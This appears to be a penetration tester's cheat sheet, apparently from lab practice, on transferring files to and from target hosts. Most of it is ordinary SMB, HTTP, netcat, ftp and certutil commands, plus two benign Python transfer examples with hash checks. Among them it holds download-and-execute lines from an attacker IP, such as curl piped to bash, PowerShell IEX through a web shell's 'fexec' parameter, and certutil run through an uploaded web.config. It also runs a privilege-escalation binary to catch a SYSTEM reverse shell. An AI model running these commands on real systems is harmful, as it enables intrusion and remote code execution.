Transfer Files

Curl

vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/               ..HTTP Basic auth
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/   ..SPNEGO/Kerberos (Negotiate) auth instead of Basic

smbserver

  • Share from Linux SMB to Windows

locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd` -smb2support     ..another method; -smb2support for Windows 10+ clients that refuse SMB1
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\share                     ..map a drive (share name as set in smbserver above)
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run straight from the share, no local copy needed

Windows Share

  • Linux: Copy to Windows Share

smbclient //10.x.x.x/sharename -U domain/username -c "put localfile remotefile"   ..drop -c for an interactive session
  • Linux: Mount Windows Share

mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
  • Windows: Copy to Windows Share

copy exploit.exe \\10.x.x.x\users\bob

HTTP Server One Liners

> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
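Every one-liner above does the same job: emit a status line, headers, a blank line, then the raw bytes of the file. Added example, not from these notes: a Python HTTP file server written on raw sockets that produces exactly that response, plus a client that pulls the file the way `curl -o` does and compares a SHA-256 computed on the serving side, which is the check you want before running a transferred binary. The function names (http_response, serve_directory, fetch_and_verify, demo) and the sample payload are mine; it runs on loopback only.

```python
import hashlib
import os
import socket
import tempfile
import threading
import urllib.request


def sha256_file(path):
    """Hash a file in chunks; run this before sharing and again after download."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def http_response(directory, request_line):
    """Turn one request line ("GET /tool.bin HTTP/1.1") into a full raw response:
    status line, headers, blank line, body -- the bytes the ncat/inetd one-liners emit by hand."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return b"HTTP/1.0 405 Method Not Allowed\r\nContent-Length: 0\r\n\r\n"
    # basename() drops every directory component, so "../../etc/passwd" can only
    # ever name a file called "passwd" inside the shared directory.
    name = os.path.basename(parts[1].split("?", 1)[0])
    path = os.path.join(directory, name)
    if not name or not os.path.isfile(path):
        return b"HTTP/1.0 404 Not Found\r\nContent-Length: 0\r\n\r\n"
    with open(path, "rb") as f:
        body = f.read()
    headers = ("HTTP/1.0 200 OK\r\n"
               "Content-Type: application/octet-stream\r\n"
               f"Content-Length: {len(body)}\r\n"
               "Connection: close\r\n\r\n")
    return headers.encode() + body


def serve_directory(directory, host="127.0.0.1", port=0):
    """Bind, then answer one request per connection in a background thread.
    Returns (port, stop_event); port 0 lets the OS pick a free one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    srv.settimeout(0.2)              # so the accept loop can notice stop_event
    stop = threading.Event()

    def loop():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(5)
                request = conn.recv(4096).decode("latin-1")
                conn.sendall(http_response(directory, request.split("\r\n", 1)[0]))
        srv.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], stop


def fetch_and_verify(url, dest, expected_sha256):
    """Client side: download like `curl <url> -o <dest>`, then check the hash.
    True only when the copy on disk matches what was served."""
    with urllib.request.urlopen(url, timeout=5) as resp, open(dest, "wb") as out:
        out.write(resp.read())
    return sha256_file(dest) == expected_sha256


def demo():
    """Constructed payload (every byte value, so any CR/LF mangling would show):
    share it, pull it, verify it."""
    share = tempfile.mkdtemp()
    payload = os.path.join(share, "tool.bin")
    with open(payload, "wb") as f:
        f.write(bytes(range(256)) * 64)
    expected = sha256_file(payload)
    port, stop = serve_directory(share)
    try:
        dest = os.path.join(tempfile.mkdtemp(), "tool.bin")
        return fetch_and_verify(f"http://127.0.0.1:{port}/tool.bin", dest, expected)
    finally:
        stop.set()


if __name__ == "__main__":
    print("transfer verified:", demo())
```

The 405/404 branches matter on an engagement: a share opened on port 80 is reachable by everyone on the segment, so the server should never serve outside its directory or accept anything but GET.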

Powershell

----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile

Powershell Advanced

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!

smb setup issues

------------------------
Install Attempts:

python --version
python3 --version
sudo apt-get install python3.6-dev libmysqlclient-dev
sudo apt-get install libpcap-dev libpq-dev
pip install --user --upgrade setuptools          ..--user takes no argument
pip3 install --user --upgrade setuptools
sudo -i
cd /opt
git clone https://github.com/SecureAuthCorp/impacket.git
cd /opt/impacket
pip install .                                    ..python2 build from source
pip3 install .                                   ..python3 build from source
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket                             ..or the PyPI release instead of git
pip3 install impacket

smb setup impacket python2

Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

export PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket

smb optional

> impacket-smbserver share /path/to/myfolder     ..no backticks around the path, or the shell runs it as a command
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami

nc

Easy:

nc -lp 4444 > out.file              ..receiver first (traditional netcat: -l -p; OpenBSD nc: -l 4444)
nc -w 3 DestIP 4444 < out.file      ..sender; -w 3 closes after 3s idle


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333          ..source host listens and streams the partition
nc DestIP 3333 | pv -b > hdImage.img.gz         ..pull side; nc does no integrity check, so hash the image on both ends afterwards
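nc moves bytes but never checks them, and the `dd | gzip | nc` pipe gives you nothing to compare until both sides hash the image. Added example, not from these notes: the same push-a-compressed-stream pattern in Python, with SHA-256 taken over the plaintext on the sending side as it streams out and on the listening side as it is decompressed, so the two hashes can be compared without a second pass over the disk. The names (send_stream, receive_stream, transfer, demo) and the constructed "disk image" are mine; it runs over loopback.

```python
import gzip
import hashlib
import os
import socket
import tempfile
import threading


def send_stream(src_path, host, port, chunk=65536):
    """Sender (the `dd | gzip | nc DestIP` end): stream gzip-compressed bytes to host:port.
    Returns the SHA-256 of the uncompressed data as it was read."""
    h = hashlib.sha256()
    with socket.create_connection((host, port), timeout=10) as sock:
        wfile = sock.makefile("wb")
        with gzip.GzipFile(fileobj=wfile, mode="wb", compresslevel=9) as gz, \
                open(src_path, "rb") as f:
            for block in iter(lambda: f.read(chunk), b""):
                h.update(block)
                gz.write(block)
        wfile.close()                          # flush the gzip trailer
        sock.shutdown(socket.SHUT_WR)          # EOF tells the listener the image is complete
    return h.hexdigest()


def receive_stream(listener, dest_path, chunk=65536):
    """Listener (the `nc -l | gunzip > image` end): accept one connection, gunzip it to dest_path.
    Returns the SHA-256 of the decompressed data as it was written."""
    h = hashlib.sha256()
    conn, _ = listener.accept()
    with conn:
        rfile = conn.makefile("rb")
        with gzip.GzipFile(fileobj=rfile, mode="rb") as gz, open(dest_path, "wb") as out:
            for block in iter(lambda: gz.read(chunk), b""):
                h.update(block)
                out.write(block)
        rfile.close()
    return h.hexdigest()


def transfer(src_path, dest_path):
    """Run listener and sender on loopback; returns (sender_hash, receiver_hash)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))            # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {}

    def recv():
        result["hash"] = receive_stream(listener, dest_path)

    t = threading.Thread(target=recv)
    t.start()
    sent = send_stream(src_path, "127.0.0.1", port)
    t.join(30)
    listener.close()
    return sent, result.get("hash")


def demo():
    """Constructed ~1 MiB 'disk image' with a compressible pattern.
    True only when both hashes and both sizes agree."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "disk.img")
    with open(src, "wb") as f:
        f.write((b"\x00" * 4096 + bytes(range(256))) * 240)
    dest = os.path.join(work, "disk.img.received")
    sent, received = transfer(src, dest)
    return sent == received and os.path.getsize(src) == os.path.getsize(dest)


if __name__ == "__main__":
    print("image intact:", demo())
```

On a real box the sending hash is what `sha256sum /dev/hda3` would give you after the fact; computing it inline avoids reading a slow disk twice.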

updog

updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

ftp

linux:
pip install pyftpdlib
python -m pyftpdlib -w                          ..anonymous, writable, default port 2121
python3 -m pyftpdlib -p 21 -u mike -P paxx -w   ..-w allows uploads (put); port 21 needs root
 
windows:
ftp
open $MyIP
user mike paxx
binary                                          ..ftp.exe defaults to ASCII mode, which mangles exe/dll
put localfilename remotefilename
bye

..Windows ftp.exe has no passive mode: the server must be able to open the data connection back to the client
ftp -v -n -s:ftpcommands.txt   ..optional, script the commands above

Permission Trouble

  • You may have a permissions problem

  • Save and execute from the Temp folder!

cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe

certutil

  • You can download files on Windows with this tool

  • REF: HTB Bounty (web.config upload)

rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..request the uploaded web.config so IIS runs the Exec calls above
